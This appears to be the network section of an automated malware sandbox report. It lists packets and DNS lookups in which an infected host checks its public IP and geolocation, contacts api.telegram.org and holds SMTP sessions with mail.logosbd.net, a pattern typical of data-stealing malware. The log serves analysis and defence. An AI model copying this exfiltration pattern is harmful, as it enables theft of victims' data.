Jul 24, 2024 14:47:27.021744013 CEST	49706	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:27.026747942 CEST	80	49706	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:27.824696064 CEST	80	49706	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:27.829256058 CEST	49706	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:27.834455967 CEST	80	49706	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:28.487992048 CEST	80	49706	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:28.531341076 CEST	49706	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:28.660929918 CEST	49707	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:28.660975933 CEST	443	49707	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:28.661031961 CEST	49707	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:28.669692993 CEST	49707	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:28.669711113 CEST	443	49707	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:29.207293034 CEST	443	49707	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:29.207390070 CEST	49707	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:29.213674068 CEST	49707	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:29.213687897 CEST	443	49707	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:29.214056015 CEST	443	49707	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:29.265666962 CEST	49707	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:29.272721052 CEST	49707	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:29.316505909 CEST	443	49707	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:29.719738007 CEST	443	49707	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:29.719826937 CEST	443	49707	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:29.719893932 CEST	49707	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:29.725553036 CEST	49707	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:29.728909969 CEST	49706	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:29.734124899 CEST	80	49706	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:29.926409960 CEST	80	49706	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:29.929018021 CEST	49708	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:29.929063082 CEST	443	49708	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:29.929152012 CEST	49708	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:29.929488897 CEST	49708	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:29.929500103 CEST	443	49708	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:29.968846083 CEST	49706	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:30.473809958 CEST	443	49708	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:30.476649046 CEST	49708	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:30.476675987 CEST	443	49708	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:30.637259960 CEST	443	49708	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:30.637373924 CEST	443	49708	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:30.637442112 CEST	49708	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:30.637989998 CEST	49708	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:30.641613007 CEST	49706	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:30.643385887 CEST	49709	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:30.648240089 CEST	80	49706	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:30.648334980 CEST	80	49709	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:30.648334980 CEST	49706	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:30.648505926 CEST	49709	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:30.648588896 CEST	49709	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:30.653321981 CEST	80	49709	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:32.067794085 CEST	80	49709	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:32.069123030 CEST	49710	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:32.069175959 CEST	443	49710	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:32.069241047 CEST	49710	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:32.069495916 CEST	49710	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:32.069508076 CEST	443	49710	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:32.109432936 CEST	49709	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:32.768553972 CEST	443	49710	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:32.770250082 CEST	49710	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:32.770278931 CEST	443	49710	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:32.903251886 CEST	443	49710	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:32.903351068 CEST	443	49710	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:32.903414965 CEST	49710	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:32.903949976 CEST	49710	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:32.908653975 CEST	49711	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:32.913810968 CEST	80	49711	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:32.913908958 CEST	49711	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:32.914035082 CEST	49711	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:32.920180082 CEST	80	49711	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:33.730283976 CEST	80	49711	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:33.731940985 CEST	49712	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:33.731986046 CEST	443	49712	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:33.732280016 CEST	49712	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:33.732506990 CEST	49712	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:33.732528925 CEST	443	49712	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:33.781445026 CEST	49711	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:34.483200073 CEST	443	49712	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:34.484991074 CEST	49712	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:34.485003948 CEST	443	49712	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:34.637196064 CEST	443	49712	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:34.637305975 CEST	443	49712	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:34.637372017 CEST	49712	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:34.637949944 CEST	49712	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:34.645637989 CEST	49711	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:34.646986961 CEST	49713	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:34.675468922 CEST	80	49711	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:34.675580978 CEST	49711	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:34.676704884 CEST	80	49713	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:34.676800013 CEST	49713	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:34.685204983 CEST	49713	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:34.690243959 CEST	80	49713	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:36.110316992 CEST	80	49713	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:36.111807108 CEST	49714	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:36.111851931 CEST	443	49714	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:36.111921072 CEST	49714	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:36.112252951 CEST	49714	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:36.112262964 CEST	443	49714	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:36.156363010 CEST	49713	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:36.585398912 CEST	443	49714	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:36.586987019 CEST	49714	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:36.587023973 CEST	443	49714	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:36.735470057 CEST	443	49714	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:36.735723019 CEST	443	49714	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:36.735794067 CEST	49714	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:36.736167908 CEST	49714	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:36.747745991 CEST	49713	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:36.748830080 CEST	49715	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:36.753797054 CEST	80	49715	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:36.754007101 CEST	49715	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:36.754164934 CEST	49715	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:36.754954100 CEST	80	49713	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:36.755086899 CEST	49713	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:36.759694099 CEST	80	49715	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:37.328831911 CEST	80	49715	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:37.330322981 CEST	49716	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:37.330363035 CEST	443	49716	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:37.330457926 CEST	49716	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:37.330741882 CEST	49716	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:37.330754995 CEST	443	49716	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:37.375242949 CEST	49715	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:37.870934010 CEST	443	49716	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:37.888008118 CEST	49716	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:37.888037920 CEST	443	49716	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:38.038520098 CEST	443	49716	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:38.038762093 CEST	443	49716	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:38.038825035 CEST	49716	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:38.039232016 CEST	49716	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:38.042589903 CEST	49715	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:38.043694973 CEST	49717	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:38.048568964 CEST	80	49715	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:38.048634052 CEST	49715	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:38.048707008 CEST	80	49717	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:38.048780918 CEST	49717	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:38.049007893 CEST	49717	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:38.054203033 CEST	80	49717	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:39.041881084 CEST	80	49717	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:39.043411016 CEST	49718	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:39.043459892 CEST	443	49718	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:39.043647051 CEST	49718	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:39.043886900 CEST	49718	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:39.043903112 CEST	443	49718	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:39.093950987 CEST	49717	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:39.678838015 CEST	443	49718	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:39.680811882 CEST	49718	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:39.680835962 CEST	443	49718	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:39.825845003 CEST	443	49718	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:39.826050997 CEST	443	49718	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:39.826239109 CEST	49718	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:39.826733112 CEST	49718	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:39.830475092 CEST	49717	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:39.831365108 CEST	49719	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:39.836430073 CEST	80	49719	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:39.836565971 CEST	49719	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:39.836724997 CEST	49719	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:39.838737011 CEST	80	49717	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:39.838814020 CEST	49717	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:39.841654062 CEST	80	49719	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:40.440615892 CEST	80	49719	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:40.442051888 CEST	49720	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:40.442095041 CEST	443	49720	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:40.442169905 CEST	49720	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:40.442425966 CEST	49720	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:40.442442894 CEST	443	49720	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:40.484630108 CEST	49719	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:40.936794996 CEST	443	49720	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:40.938556910 CEST	49720	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:40.938599110 CEST	443	49720	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:41.095870018 CEST	443	49720	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:41.095977068 CEST	443	49720	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:41.096028090 CEST	49720	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:41.096533060 CEST	49720	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:41.099204063 CEST	49719	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:41.100353956 CEST	49721	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:41.106152058 CEST	80	49719	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:41.106220007 CEST	49719	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:41.106497049 CEST	80	49721	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:41.106560946 CEST	49721	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:41.106712103 CEST	49721	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:41.111654043 CEST	80	49721	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:42.810728073 CEST	80	49721	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:42.812109947 CEST	80	49721	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:42.812153101 CEST	49722	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:42.812163115 CEST	49721	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:42.812191010 CEST	443	49722	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:42.812277079 CEST	49722	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:42.812474966 CEST	49722	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:42.812496901 CEST	443	49722	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:42.814202070 CEST	80	49721	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:42.814291000 CEST	49721	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:43.339472055 CEST	443	49722	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:43.341239929 CEST	49722	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:43.341258049 CEST	443	49722	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:43.512891054 CEST	443	49722	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:43.512991905 CEST	443	49722	188.114.96.3	192.168.2.9
Jul 24, 2024 14:47:43.513143063 CEST	49722	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:43.513592005 CEST	49722	443	192.168.2.9	188.114.96.3
Jul 24, 2024 14:47:43.531039000 CEST	49721	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:43.537524939 CEST	80	49721	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:43.537585020 CEST	49721	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:43.538897038 CEST	49725	443	192.168.2.9	149.154.167.220
Jul 24, 2024 14:47:43.538954020 CEST	443	49725	149.154.167.220	192.168.2.9
Jul 24, 2024 14:47:43.539024115 CEST	49725	443	192.168.2.9	149.154.167.220
Jul 24, 2024 14:47:43.539460897 CEST	49725	443	192.168.2.9	149.154.167.220
Jul 24, 2024 14:47:43.539489031 CEST	443	49725	149.154.167.220	192.168.2.9
Jul 24, 2024 14:47:44.188626051 CEST	443	49725	149.154.167.220	192.168.2.9
Jul 24, 2024 14:47:44.188724995 CEST	49725	443	192.168.2.9	149.154.167.220
Jul 24, 2024 14:47:44.190644026 CEST	49725	443	192.168.2.9	149.154.167.220
Jul 24, 2024 14:47:44.190673113 CEST	443	49725	149.154.167.220	192.168.2.9
Jul 24, 2024 14:47:44.191097021 CEST	443	49725	149.154.167.220	192.168.2.9
Jul 24, 2024 14:47:44.192699909 CEST	49725	443	192.168.2.9	149.154.167.220
Jul 24, 2024 14:47:44.236512899 CEST	443	49725	149.154.167.220	192.168.2.9
Jul 24, 2024 14:47:44.437887907 CEST	443	49725	149.154.167.220	192.168.2.9
Jul 24, 2024 14:47:44.437963963 CEST	443	49725	149.154.167.220	192.168.2.9
Jul 24, 2024 14:47:44.438147068 CEST	49725	443	192.168.2.9	149.154.167.220
Jul 24, 2024 14:47:44.446866989 CEST	49725	443	192.168.2.9	149.154.167.220
Jul 24, 2024 14:47:49.963969946 CEST	49709	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:55.747302055 CEST	58267	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:47:55.753139019 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:47:55.753201962 CEST	58267	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:01.534640074 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:01.534882069 CEST	58267	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:01.541472912 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:05.121339083 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:05.121558905 CEST	58267	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:05.126468897 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:06.968308926 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:06.968926907 CEST	58267	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:06.969791889 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:06.969851971 CEST	58267	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:06.974369049 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:07.734782934 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:07.734843969 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:07.734899998 CEST	58267	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:07.735068083 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:07.735120058 CEST	58267	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:08.120872974 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:08.121045113 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:08.121082067 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:08.121112108 CEST	58267	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:08.172053099 CEST	58267	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:08.226794958 CEST	58267	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:08.233180046 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:09.779969931 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:09.784012079 CEST	58267	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:09.789225101 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:16.410703897 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:16.411773920 CEST	58267	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:16.416789055 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:16.987793922 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:16.988382101 CEST	58267	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:16.993580103 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:19.547662973 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:19.547956944 CEST	58267	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:19.553086996 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:20.419619083 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:20.420056105 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:20.420072079 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:20.420152903 CEST	58267	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:20.420294046 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:20.420358896 CEST	58267	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:20.426467896 CEST	58267	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:20.431643963 CEST	587	58267	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:23.456595898 CEST	58269	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:23.463222980 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:23.465373993 CEST	58269	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:35.880640984 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:35.880906105 CEST	58269	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:35.886750937 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:37.436939001 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:37.437124968 CEST	58269	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:37.475956917 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:38.948863029 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:38.950911045 CEST	58269	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:38.955883980 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:42.347538948 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:42.347645044 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:42.347657919 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:42.347747087 CEST	58269	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:42.348237991 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:42.348251104 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:42.348299980 CEST	58269	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:42.353419065 CEST	58269	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:42.358814955 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:43.824995995 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:43.826154947 CEST	58269	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:43.831113100 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:45.292738914 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:45.293081045 CEST	58269	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:45.298163891 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:45.868742943 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:45.871968031 CEST	58269	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:45.878077984 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:48.473807096 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:48.474925041 CEST	58269	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:48.480391979 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:49.058332920 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:49.058970928 CEST	58269	587	192.168.2.9	202.4.96.3
Jul 24, 2024 14:48:49.066068888 CEST	587	58269	202.4.96.3	192.168.2.9
Jul 24, 2024 14:48:49.066306114 CEST	58269	587	192.168.2.9	202.4.96.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 24, 2024 14:47:26.801558018 CEST	63331	53	192.168.2.9	1.1.1.1
Jul 24, 2024 14:47:27.009922028 CEST	53	63331	1.1.1.1	192.168.2.9
Jul 24, 2024 14:47:28.635087013 CEST	49635	53	192.168.2.9	1.1.1.1
Jul 24, 2024 14:47:28.660237074 CEST	53	49635	1.1.1.1	192.168.2.9
Jul 24, 2024 14:47:43.530750990 CEST	59426	53	192.168.2.9	1.1.1.1
Jul 24, 2024 14:47:43.538304090 CEST	53	59426	1.1.1.1	192.168.2.9
Jul 24, 2024 14:47:50.561053991 CEST	54480	53	192.168.2.9	1.1.1.1
Jul 24, 2024 14:47:51.563173056 CEST	54480	53	192.168.2.9	1.1.1.1
Jul 24, 2024 14:47:51.890649080 CEST	53	54480	1.1.1.1	192.168.2.9
Jul 24, 2024 14:47:58.191803932 CEST	53	54480	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 24, 2024 14:47:26.801558018 CEST	192.168.2.9	1.1.1.1	0x6ef1	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jul 24, 2024 14:47:28.635087013 CEST	192.168.2.9	1.1.1.1	0xe47f	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jul 24, 2024 14:47:43.530750990 CEST	192.168.2.9	1.1.1.1	0xa1e6	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jul 24, 2024 14:47:50.561053991 CEST	192.168.2.9	1.1.1.1	0x6d	Standard query (0)	mail.logosbd.net	A (IP address)	IN (0x0001)	false
Jul 24, 2024 14:47:51.563173056 CEST	192.168.2.9	1.1.1.1	0x6d	Standard query (0)	mail.logosbd.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 24, 2024 14:47:19.482240915 CEST	1.1.1.1	192.168.2.9	0x4bd4	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jul 24, 2024 14:47:19.482240915 CEST	1.1.1.1	192.168.2.9	0x4bd4	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jul 24, 2024 14:47:27.009922028 CEST	1.1.1.1	192.168.2.9	0x6ef1	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 24, 2024 14:47:27.009922028 CEST	1.1.1.1	192.168.2.9	0x6ef1	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jul 24, 2024 14:47:27.009922028 CEST	1.1.1.1	192.168.2.9	0x6ef1	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jul 24, 2024 14:47:27.009922028 CEST	1.1.1.1	192.168.2.9	0x6ef1	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
